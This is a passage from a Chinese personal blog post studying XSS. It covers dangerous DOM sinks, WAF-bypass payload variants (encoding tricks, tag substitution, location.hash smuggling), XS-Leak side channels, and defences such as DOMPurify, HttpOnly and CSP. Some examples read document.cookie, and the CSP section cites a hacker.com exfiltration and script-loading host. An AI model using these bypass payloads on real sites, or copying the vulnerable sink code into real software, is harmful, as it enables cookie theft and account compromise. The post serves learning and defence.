<li><p><strong>安全规范 (防御方案)</strong>：</p>
<ul>
<li><p><strong>绝对禁止使用 <code>eval()</code></strong>。如果是为了解析 JSON，必须使用标准的 <code>JSON.parse()</code>。</p>
</li>
<li><p>使用 <code>setTimeout</code> 和 <code>setInterval</code> 时，<strong>永远只传入函数引用（回调函数），绝不传入字符串</strong>。例如：<code>setTimeout(function() &#123; console.log(userName); &#125;, 1000);</code>。</p>
</li>
</ul>
</li>
</ul>
<h3 id="5-动态设置属性：location-href-onclick-onerror"><a href="#5-动态设置属性：location-href-onclick-onerror" class="headerlink" title="5. 动态设置属性：location.href, onclick, onerror"></a>5. 动态设置属性：<code>location.href</code>, <code>onclick</code>, <code>onerror</code></h3><p>这类 API 不会直接解析 HTML，也不会显式调用执行器，但它们控制着浏览器的<strong>跳转行为</strong>和<strong>事件响应机制</strong>，稍有不慎就会被黑客利用“伪协议”或“事件劫持”完成攻击。</p>
<ul>
<li><p><strong>跳转属性：<code>location.href</code> (或 <code>window.location</code>, <code>a.href</code>)</strong>：</p>
<ul>
<li><p><strong>作用</strong>：控制浏览器当前窗口的 URL 地址，常用于页面的重定向或返回上一页功能。</p>
</li>
<li><p><strong>漏洞场景</strong>：</p>
<p>  JavaScript</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// 从 URL 获取 &quot;next&quot; 参数作为返回地址</span><br><span class="line">let backUrl = new URLSearchParams(location.search).get(&#x27;next&#x27;);</span><br><span class="line">// 危险代码：未校验协议，直接赋值给 a 标签的 href</span><br><span class="line">document.getElementById(&#x27;backButton&#x27;).href = backUrl;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>攻击Payload</strong>：黑客构造链接 <code>?next=javascript:alert(document.cookie)</code>。 当用户点击“返回”按钮时，浏览器发现这是一个 <code>javascript:</code> 伪协议，于是它<strong>不会进行网页跳转，而是直接执行后面的 JavaScript 代码</strong>。</p>
</li>
</ul>
</li>
<li><p><strong>事件属性：<code>onclick</code>, <code>onerror</code>, <code>onmouseover</code> 等</strong>：</p>
<ul>
<li><p><strong>作用</strong>：为 DOM 元素绑定用户交互事件。</p>
</li>
<li><p><strong>漏洞场景</strong>：</p>
<p>  JavaScript</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">let action = new URLSearchParams(location.search).get(&#x27;action&#x27;);</span><br><span class="line">// 危险代码：动态设置元素的 onclick 属性</span><br><span class="line">let btn = document.getElementById(&#x27;myBtn&#x27;);</span><br><span class="line">btn.setAttribute(&#x27;onclick&#x27;, action);</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>攻击Payload</strong>：黑客传入 <code>?action=alert(1)</code>。当受害者点击该按钮时，恶意代码触发。</p>
</li>
</ul>
</li>
</ul>
<hr>
<h2 id="三、-WAF-绕过技术"><a href="#三、-WAF-绕过技术" class="headerlink" title="三、 WAF 绕过技术"></a>三、 WAF 绕过技术</h2><p>在遇到内容过滤设备（WAF）时，需要利用浏览器各解析引擎的特性进行绕过。</p>
<h3 id="1-常见触发向量与标签替换"><a href="#1-常见触发向量与标签替换" class="headerlink" title="1. 常见触发向量与标签替换"></a>1. 常见触发向量与标签替换</h3><p>当 <code>&lt;script&gt;</code> 标签被过滤时，需依赖其他HTML标签的属性解析机制。</p>
<ul>
<li><p><strong>资源加载报错型</strong>：<code>&lt;img src=x onerror=alert(1)&gt;</code>, <code>&lt;audio src=1 onerror=alert(1)&gt;</code></p>
</li>
<li><p><strong>自动交互型</strong>：<code>&lt;input onfocus=alert(1) autofocus&gt;</code></p>
</li>
<li><p><strong>伪协议型</strong>：<code>&lt;a href=&quot;javascript:alert(1)&quot;&gt;</code>, <code>&lt;iframe src=&quot;javascript:alert(1)&quot;&gt;</code></p>
</li>
<li><p><strong>DOM加载型</strong>：<code>&lt;svg onload=alert(1)&gt;</code>, <code>&lt;body onload=alert(1)&gt;</code></p>
</li>
</ul>
<h3 id="2-编码绕过技术"><a href="#2-编码绕过技术" class="headerlink" title="2. 编码绕过技术"></a>2. 编码绕过技术</h3><p>浏览器的解码顺序为：HTML实体解码 -&gt; URL解码 -&gt; JS&#x2F;Unicode解码。</p>
<ul>
<li><p><strong>HTML 实体编码</strong>：适用于标签的属性值内（如 <code>src</code>, <code>href</code>, <code>onerror</code>）。</p>
<ul>
<li><p>十六进制：<code>&lt;img src=x onerror=&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;(1)&gt;</code></p>
</li>
<li><p>十进制：<code>&lt;img src=x onerror=&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;(1)&gt;</code></p>
</li>
</ul>
</li>
<li><p><strong>URL 编码</strong>：适用于 <code>href</code> 或 <code>src</code> 等需要进行URL解析的属性。</p>
<ul>
<li><code>&lt;a href=&quot;javascript:%61%6c%65%72%74(1)&quot;&gt;</code> (注：协议头 <code>javascript:</code> 不可被URL编码)</li>
</ul>
</li>
<li><p><strong>Unicode 编码</strong>：适用于JS执行上下文中，仅能对标识符（变量名、函数名）进行编码，不能编码控制字符（如括号）。</p>
<ul>
<li><code>&lt;img src=x onerror=&quot;\u0061\u006c\u0065\u0072\u0074(1)&quot;&gt;</code></li>
</ul>
</li>
<li><p><strong>Base64 编码</strong>：配合 <code>data:</code> 伪协议或 <code>atob()</code> 函数。</p>
<ul>
<li><code>&lt;a href=&quot;javascript:eval(atob(&#39;YWxlcnQoMSk=&#39;))&quot;&gt;</code></li>
</ul>
</li>
</ul>
<h3 id="3-语法糖与结构绕过"><a href="#3-语法糖与结构绕过" class="headerlink" title="3. 语法糖与结构绕过"></a>3. 语法糖与结构绕过</h3><ul>
<li><p><strong>大小写与空格</strong>：<code>&lt;ScrIpt&gt;alert(1)&lt;/sCRipT&gt;</code>，使用 <code>%09</code>, <code>%0A</code>, <code>/**/</code>, <code>/</code> 替代空格。</p>
</li>
<li><p><strong>符号替换</strong>：</p>
<ul>
<li><p>反引号替代圆括号：<code>&lt;img src=x onerror=alert</code>1<code>&gt;</code></p>
</li>
<li><p>Throw语句绕过：<code>&lt;img src onerror=&quot;window.onerror=eval;throw &#39;=alert\x281\x29&#39;&quot;&gt;</code></p>
</li>
</ul>
</li>
<li><p><strong>函数拼接</strong>：<code>&lt;img src=x onerror=&quot;window[&#39;al&#39;+&#39;ert&#39;](1)&quot;&gt;</code></p>
</li>
<li><p><strong>长度限制绕过</strong>：利用 <code>location.hash</code> 或 <code>window.name</code> 传递长Payload。</p>
<ul>
<li><code>?name=&lt;svg/onload=eval(location.hash.substr(1))&gt;#alert(document.cookie)</code></li>
</ul>
</li>
</ul>
<hr>
<h2 id="四-XS-Leak-跨站泄漏"><a href="#四-XS-Leak-跨站泄漏" class="headerlink" title="四 XS-Leak (跨站泄漏)"></a>四 XS-Leak (跨站泄漏)</h2><p>当目标系统部署了严格的 CSP (内容安全策略) 或严格过滤导致彻底无法执行 JavaScript 代码时，传统的 XSS 攻击失效，需转向 XS-Leak 侧信道攻击。</p>
<h3 id="1-XS-Leak-原理"><a href="#1-XS-Leak-原理" class="headerlink" title="1. XS-Leak 原理"></a>1. XS-Leak 原理</h3><p>XS-Leak 是一种利用浏览器底层行为特征（侧信道）来<strong>推断</strong>目标网站敏感信息的攻击方式。它不要求在目标网站执行代码，而是利用同源策略的机制“盲区”，通过测量跨域请求的副作用（Side Effects）来提取信息。</p>
<h3 id="2-经典探测向量-Vectors"><a href="#2-经典探测向量-Vectors" class="headerlink" title="2. 经典探测向量 (Vectors)"></a>2. 经典探测向量 (Vectors)</h3><ul>
<li><p><strong>加载时长测信道 (Timing Attack)</strong>：</p>
<ul>
<li><p><strong>原理</strong>：利用目标系统处理命中数据与未命中数据的时间差进行布尔盲注。</p>
</li>
<li><p><strong>示例</strong>：目标搜索接口，检索到敏感词耗时500ms，未检索到耗时50ms。攻击者嵌套 <code>&lt;script&gt; img.src=&quot;http://target.com/search?q=admin&quot; &lt;/script&gt;</code> 并测量加载时间，推断结果。</p>
</li>
</ul>
</li>
<li><p><strong>窗口&#x2F;框架数量探测 (Frame Counting)</strong>：</p>
<ul>
<li><p><strong>原理</strong>：虽然SOP禁止读取跨域DOM的内容，但由于历史遗留设计，浏览器允许跨域读取 <code>window.length</code>（目标页面包含的 iframe 数量）。</p>
</li>
<li><p><strong>示例</strong>：利用 <code>let win = window.open(&quot;url&quot;)</code> 打开目标查询页，延时后通过 <code>win.length</code> 判断页面渲染结果。</p>
</li>
</ul>
</li>
<li><p><strong>错误状态探测 (Error Events)</strong>：</p>
<ul>
<li><p><strong>原理</strong>：利用目标接口返回的状态码触发不同的浏览器资源加载事件。</p>
</li>
<li><p><strong>示例</strong>：探测登录状态。 <code>&lt;script src=&quot;http://target.com/api/user&quot; onload=&quot;Log(&#39;Auth&#39;)&quot; onerror=&quot;Log(&#39;UnAuth&#39;)&quot;&gt;&lt;/script&gt;</code>。请求成功（200 OK）触发 <code>onload</code>，鉴权失败（401&#x2F;302）触发 <code>onerror</code>。</p>
</li>
</ul>
</li>
</ul>
<hr>
<h2 id="五、-XSS-工程化防御体系"><a href="#五、-XSS-工程化防御体系" class="headerlink" title="五、 XSS 工程化防御体系"></a>五、 XSS 工程化防御体系</h2><p>在全栈开发阶段，必须落实以下防御规范：</p>
<ol>
<li><p><strong>输入验证 (Input Validation)</strong>：采用白名单机制，严格校验数据类型、长度、格式。</p>
</li>
<li><p><strong>输出转义 (Output Encoding)</strong>：在数据渲染到DOM前，进行HTML实体编码（将 <code>&lt;</code> 转为 <code>&amp;lt;</code> 等）。现代前端框架（React&#x2F;Vue）在数据绑定时默认开启防御，但需注意 <code>v-html</code> 或 <code>dangerouslySetInnerHTML</code> 等高危用法。<br>在现代前端开发中，Vue 和 React 这样的主流框架其实已经为我们做好了底层的安全防护。默认情况下，当你使用它们的数据绑定语法（比如 Vue 的 <code>&#123;&#123; &#125;&#125;</code> 或者 React 的 <code>&#123;&#125;</code>）时，框架会<strong>自动将数据作为纯文本处理</strong>。也就是说，框架会在底层自动进行 HTML 实体转义，把 <code>&lt;</code> 变成 <code>&amp;lt;</code>。</p>
</li>
</ol>
<p>但是，在某些真实的业务场景中，我们确实需要向页面渲染一段带有格式的富文本（比如你在博客后台用富文本编辑器写的一篇文章，里面包含了加粗、图片等标签）。如果框架还是强行转义，页面上就会直接显示出难看的 <code>&lt;b&gt;加粗&lt;/b&gt;</code> 代码，而不是格式化后的文本。</p>
<p>为了解决这个需求，React 和 Vue 给开发者留了一个“后门” API，用来<strong>绕过框架自带的转义保护，直接渲染原生 HTML</strong>。这两个后门，就是 <code>dangerouslySetInnerHTML</code> 和 <code>v-html</code>。<br>在代码审计现代单页应用（SPA）时，Vue 的 <code>v-html</code> 和 React 的 <code>dangerouslySetInnerHTML</code> 是最容易引发 DOM 型 XSS 的高危触发点（Sinks）。它们在底层的本质，依然是调用了极其危险的 <code>innerHTML</code>。</p>
<ul>
<li>React 的 <code>dangerouslySetInnerHTML</code><br>React 官方极其注重安全，因此故意给这个属性起了一个非常长且吓人的名字（直译为：危险地设置内部 HTML），目的就是每次你在敲击键盘输入这段代码时，都能意识到自己正在做一件危险的事情。</li>
</ul>
<p><strong>漏洞代码示例：</strong></p>
<p>JavaScript</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">import React from &#x27;react&#x27;;</span><br><span class="line"></span><br><span class="line">function ArticleView() &#123;</span><br><span class="line">  // 假设 articleContent 是从 URL 参数或未过滤的数据库中获取的</span><br><span class="line">  const articleContent = &quot;&lt;img src=x onerror=alert(&#x27;React_XSS&#x27;)&gt;&quot;;</span><br><span class="line"></span><br><span class="line">  return (</span><br><span class="line">    &lt;div&gt;</span><br><span class="line">      &#123;/* 正常写法（安全）：React 会自动把 &lt; 转义为 &amp;lt; ，页面上只会显示文本 */&#125;</span><br><span class="line">      &lt;div&gt;&#123;articleContent&#125;&lt;/div&gt; </span><br><span class="line"></span><br><span class="line">      &#123;/* 高危写法（DOM XSS 触发）：React 放弃转义，直接将恶意代码插入 DOM */&#125;</span><br><span class="line">      &lt;div dangerouslySetInnerHTML=&#123;&#123; __html: articleContent &#125;&#125; /&gt;</span><br><span class="line">    &lt;/div&gt;</span><br><span class="line">  );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>Vue.js 的 <code>v-html</code> 指令</li>
</ul>
<p>Vue 的做法相对简洁，提供了一个 <code>v-html</code> 指令。它的作用和 React 完全一致：告诉 Vue 引擎，“请不要对这个变量进行转义，直接把它当成 HTML 塞进这个标签里”。</p>
<p><strong>漏洞代码示例：</strong></p>
<p>代码段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;template&gt;</span><br><span class="line">  &lt;div&gt;</span><br><span class="line">    &lt;p&gt;&#123;&#123; userComment &#125;&#125;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">    &lt;p v-html=&quot;userComment&quot;&gt;&lt;/p&gt;</span><br><span class="line">  &lt;/div&gt;</span><br><span class="line">&lt;/template&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;</span><br><span class="line">export default &#123;</span><br><span class="line">  data() &#123;</span><br><span class="line">    return &#123;</span><br><span class="line">      // 假设这是黑客输入的评论</span><br><span class="line">      userComment: &quot;&lt;svg onload=alert(&#x27;Vue_XSS&#x27;)&gt;&quot; </span><br><span class="line">    &#125;;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>防御规范 (DOM Sanitization)</li>
</ul>
<p>既然这两个 API 这么危险，但业务又确实需要渲染富文本，我们该怎么办？</p>
<p>业界标准的做法是：<strong>在把不受信任的数据丢给 <code>v-html</code> 或 <code>dangerouslySetInnerHTML</code> 渲染之前，必须先使用专门的 DOM 清洗库（如 <code>DOMPurify</code>）进行“消毒”。</strong></p>
<p><code>DOMPurify</code> 的工作原理是：它会在内存中解析这串 HTML，然后根据一份严格的白名单，把所有危险的标签（如 <code>&lt;script&gt;</code>、<code>&lt;object&gt;</code>）和危险的属性（如 <code>onerror</code>、<code>onload</code>、<code>javascript: href</code>）全部剥离剔除，最后只返回干净、安全的 HTML 结构。</p>
<p><strong>安全修复后的代码示例：</strong></p>
<p>JavaScript</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">// 引入净化库</span><br><span class="line">import DOMPurify from &#x27;dompurify&#x27;;</span><br><span class="line"></span><br><span class="line">// 假设这是用户提交的脏数据（既有正常标签，也有恶意代码）</span><br><span class="line">const dirtyData = &quot;&lt;b&gt;加粗文本&lt;/b&gt;&lt;img src=x onerror=alert(1)&gt;&quot;;</span><br><span class="line"></span><br><span class="line">// 1. 进行清洗消毒</span><br><span class="line">const cleanData = DOMPurify.sanitize(dirtyData); </span><br><span class="line">// 清洗后，cleanData 的值变成了：&quot;&lt;b&gt;加粗文本&lt;/b&gt;&lt;img src=x&gt;&quot; (恶意 onerror 被剔除)</span><br><span class="line"></span><br><span class="line">// 2. 再安全地进行渲染</span><br><span class="line">// React 写法: &lt;div dangerouslySetInnerHTML=&#123;&#123; __html: cleanData &#125;&#125; /&gt;</span><br><span class="line">// Vue 写法:   &lt;div v-html=&quot;cleanData&quot;&gt;&lt;/div&gt;</span><br></pre></td></tr></table></figure>
<ol start="3">
<li><p><strong>HttpOnly Cookie</strong>：在Set-Cookie响应头中启用 <code>HttpOnly</code> 标志，阻断JS通过 <code>document.cookie</code> 读取凭证。</p>
</li>
<li><p><strong>内容安全策略 (Content-Security-Policy, CSP)</strong>：配置 HTTP Header，白名单限制页面允许加载和执行的资源来源，禁用内联脚本 (<code>unsafe-inline</code>) 和危险函数 (<code>unsafe-eval</code>)。<br>服务器通过 HTTP 响应头（或 HTML 的 <code>&lt;meta&gt;</code> 标签）告诉浏览器一份极其严格的<strong>白名单</strong>。浏览器收到后，会严格按照这份白名单来决定：当前页面可以加载哪些来源的图片、执行哪些来源的脚本、甚至能不能执行内联代码。</p>
</li>
</ol>
<p>一个经典的 CSP 响应头长这样：</p>
<p>HTTP</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Security-Policy: default-src &#x27;self&#x27;; script-src &#x27;self&#x27; https://trusted.cdn.com;</span><br></pre></td></tr></table></figure>

<p> <strong>核心防御机制与关键指令</strong></p>
<ul>
<li><p><code>default-src &#39;self&#39;</code>：全局默认策略。除非特别说明，页面上所有的资源（图片、字体、脚本、框架）都只能从**本站（同源）**加载。不存在<code>&lt;img src=&quot;http://hacker.com/log&quot;&gt;</code> 把数据传出去的情况</p>
</li>
<li><p><code>script-src &#39;self&#39; https://trusted.cdn.com</code>：专门针对 JS 脚本的策略。只允许执行本站的脚本和受信任的 CDN 域名下的脚本。黑客注入了 <code>&lt;script src=&quot;http://hacker.com/evil.js&quot;&gt;&lt;/script&gt;</code>？浏览器发现域名不在白名单里，直接报错拒绝加载。</p>
</li>
<li><p><strong>封杀内联脚本（禁用 <code>&#39;unsafe-inline&#39;</code>）</strong>：在严格的 CSP 下，直接写在 HTML 里的 <code>&lt;script&gt;alert(1)&lt;/script&gt;</code> 块，或者标签上的 <code>onclick=&quot;alert(1)&quot;</code>，浏览器都会默认<strong>拒绝执行</strong>。黑客即使成功把代码注入到了 HTML 里，也变成了一堆无法运行的死字。</p>
</li>
<li><p><strong>封杀危险函数（禁用 <code>&#39;unsafe-eval&#39;</code>）</strong>：CSP 默认禁用 <code>eval()</code>, <code>setTimeout(字符串)</code> 等将字符串转化为代码执行的危险 API。</p>
</li>
</ul>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>文章作者: </span><span class="post-copyright-info"><a href="http://xiexie-qiuligao.github.io">xiexie</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>文章链接: </span><span class="post-copyright-info"><a href="http://xiexie-qiuligao.github.io/2026/03/05/%E5%85%B3%E4%BA%8Exss/">http://xiexie-qiuligao.github.io/2026/03/05/%E5%85%B3%E4%BA%8Exss/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来源 <a href="http://xiexie-qiuligao.github.io" target="_blank">Hexo</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%AD%A6%E4%B9%A0task/">学习task</a></div><div class="post-share"><div class="social-share" data-image="/img/1.png" data-sites="facebook,x,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.6/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.6/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><a class="pagination-related full-width" href="/2026/03/03/npm%E4%BD%BF%E7%94%A8%E5%92%8Cvm%E6%B2%99%E7%AE%B1/" title="npm使用和vm沙箱"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info text-right"><div class="info-1"><div class="info-item-1">下一篇</div><div class="info-item-2">npm使用和vm沙箱</div></div><div class="info-2"><div class="info-item-1">nmp使用这里去看官网的详细指令还有民间大佬的精髓总结NPM (Node Package Manager) 不仅仅是 Node.js 的包管理工具，用于安装、共享和管理项目依赖。CTF中，它更是我们进行依赖环境配置、历史漏洞复现以及供应链安全审计的必备武器。 1. 基础环境与配置NPM 会随着 Node.js 自动安装。  环境自检： * node -v 检查 Node.js 版本。  npm -v 检查 NPM 版本。  npm doctor 检查 NPM 环境的健康状态。    网络加速（国内环境）：  由于网络问题，可以配置镜像。  安装并使用淘宝镜像：npm install -g...</div></div></div></a></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><a class="pagination-related" href="/2026/01/07/SSTI%E9%81%97%E6%BC%8F%E7%9A%84%E7%9F%A5%E8%AF%86%E4%BB%A5%E5%8F%8A%E9%9D%B6%E5%9C%BAwp/" title="SSTI遗漏的知识以及靶场wp"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2026-01-07</div><div class="info-item-2">SSTI遗漏的知识以及靶场wp</div></div><div class="info-2"><div class="info-item-1">漏洞成因Flask模板注入漏洞通常是因为开发人员直接将用户输入作为模板内容进行渲染，而不是使用模板变量。例如，使用render_template_string函数时，如果用户输入被直接嵌入模板字符串中，而没有经过适当的处理，攻击者就可以注入模板代码，从而执行任意代码。 为什么不能直接用__import__(‘os’).system(‘xxx’)？ Jinja2模板引擎为了安全考虑，Jinja2 主动“阉割”了危险入口，_import__ 不在模板可访问的命名空间里。但是，Jinja2模板语法提供了执行一些表达式的能力，可以“绕到它”。 （Jinja2 是一个文本模板引擎，它能把”模板”和...</div></div></div></a><a class="pagination-related" href="/2026/03/03/npm%E4%BD%BF%E7%94%A8%E5%92%8Cvm%E6%B2%99%E7%AE%B1/" title="npm使用和vm沙箱"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2026-03-03</div><div class="info-item-2">npm使用和vm沙箱</div></div><div class="info-2"><div class="info-item-1">nmp使用这里去看官网的详细指令还有民间大佬的精髓总结NPM (Node Package Manager) 不仅仅是 Node.js 的包管理工具，用于安装、共享和管理项目依赖。CTF中，它更是我们进行依赖环境配置、历史漏洞复现以及供应链安全审计的必备武器。 1. 基础环境与配置NPM 会随着 Node.js 自动安装。  环境自检： * node -v 检查 Node.js 版本。  npm -v 检查 NPM 版本。  npm doctor 检查 NPM 环境的健康状态。    网络加速（国内环境）：  由于网络问题，可以配置镜像。  安装并使用淘宝镜像：npm install -g...</div></div></div></a><a class="pagination-related" href="/2026/02/27/docker/" title="docker"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2026-02-27</div><div class="info-item-2">docker</div></div><div class="info-2"><div class="info-item-1">Docker是什么在没有Docker之前 如果你要在电脑上跑一个别人写的 CTF Web 题目 要在自己电脑上装一堆符合的环境   Docker 就是一个极其轻量级的“虚拟机”替代方案 两个最核心的概念镜像 (Image) 它是一个只读的文件，里面打包好了操作系统基础、运行环境（比如 PHP）和题目代码容器 (Container) 容器是一个隔离的沙箱，题目就在这个沙箱里运行 基础操作 镜像   docker images  作用：查看本地所有镜像（看看你的武器库里都有啥）。   docker search &lt;关键词&gt;  场景：你想找个现成的靶场，比如输入 docker se...</div></div></div></a><a class="pagination-related" href="/2026/03/02/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" title="计算机网络"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2026-03-02</div><div class="info-item-2">计算机网络</div></div><div class="info-2"><div class="info-item-1">网络世界的坐标系 MAC地址与IP地址一、 核心架构：为什么需要物理与逻辑两套寻址体系？在网络工程架构中，MAC 地址与 IP 地址的共存并非冗余，而是为了解决网络规模扩展时的寻址效率与物理硬件解耦问题。  MAC 地址（物理寻址，平面架构）：工作在数据链路层。MAC 地址是扁平化的（Flat Addressing），它仅唯一标识网络节点的硬件接口（网卡 NIC），不包含任何拓扑位置信息。如果互联网仅依赖 MAC 地址进行路由，全球所有的路由器必须维护一张包含数十亿条目的转发表，这在内存寻址和路由收敛上是完全不可行的。  IP 地址（逻辑寻址，层次化架构）：工作在网络层。IP 地址是层次...</div></div></div></a><a class="pagination-related" href="/2026/03/01/Hgamectf/" title="Hgamectf"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2026-03-01</div><div class="info-item-2">Hgamectf</div></div><div class="info-2"><div class="info-item-1"> web 魔法书根据提示 抓包改阅读时间 得到弹窗 密码 Classic最后一行密文VUHHX{Tti Julxmzooz sm zhq Rlc azh ane Apk}然后明文VIDAR  123456计算偏移量：- V -&gt; V: 偏移 0 (A)- U -&gt; I: 偏移 12 (M) (U=20, I=8, 20-12=8)- H -&gt; D: 偏移 4 (E) (H=7, D=3, 7-4=3)- H -&gt; A: 偏移 7 (H) (H=7, A=0, 7-0=7)- X -&gt; R: 偏移 6 (G) (X=23, R=17, 23-6=17)  密文...</div></div></div></a><a class="pagination-related" href="/2026/01/27/LFI/" title="LFI"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2026-01-27</div><div class="info-item-2">LFI</div></div><div class="info-2"><div class="info-item-1"> 先写靶场  直接用get访问即可，这里对文件没有任何限制。 用upload那里学到的00截断来做，如果你要传php文件的话，可以不用管，因为他是加上后缀.php（其实我这里没有看懂这个防御方式），如果要穿其他文件的话，就在末尾用00截断 从后往前数四个，如果是.php就直接错，不是的话就直接访问，绕过的方式就很多了，可以大写绕过。也可以加点绕过。 ·addslashes()函数，addslashes()是 PHP 内置的字符串转义函数，核心作用是：在字符串中的 ** 单引号（&#39;）、双引号（&quot;）、反斜线（\）、NUL（NULL 空字符）** 这四类 “预定义特殊字符” ...</div></div></div></a></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/1.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">xiexie</div><div class="author-info-description">我的个人学习博客</div><div class="site-data"><a href="/archives/"><div class="headline">文章</div><div class="length-num">17</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">4</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xiexie-qiuligao"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81-%E6%B5%8F%E8%A7%88%E5%99%A8%E5%BA%95%E5%B1%82%E6%9C%BA%E5%88%B6%E4%B8%8E%E5%AE%89%E5%85%A8%E5%9F%BA%E7%9F%B3"><span class="toc-number">1.</span> <span class="toc-text">一、 浏览器底层机制与安全基石</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%B5%8F%E8%A7%88%E5%99%A8%E6%B8%B2%E6%9F%93%E8%BF%87%E7%A8%8B%E4%B8%8E-DOM-%E6%9E%84%E5%BB%BA"><span class="toc-number">1.1.</span> <span class="toc-text">1. 浏览器渲染过程与 DOM 构建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5-Same-Origin-Policy-SOP"><span class="toc-number">1.2.</span> <span class="toc-text">2. 同源策略 (Same-Origin Policy, SOP)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81-XSS-%E6%BC%8F%E6%B4%9E%E7%9A%84%E4%B8%89%E5%A4%A7%E6%A0%B8%E5%BF%83%E7%B1%BB%E5%9E%8B%E4%B8%8E%E6%BA%90%E7%A0%81%E5%89%96%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">二、 XSS 漏洞的三大核心类型与源码剖析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%8F%8D%E5%B0%84%E5%9E%8B-XSS-Reflected-XSS"><span class="toc-number">2.1.</span> <span 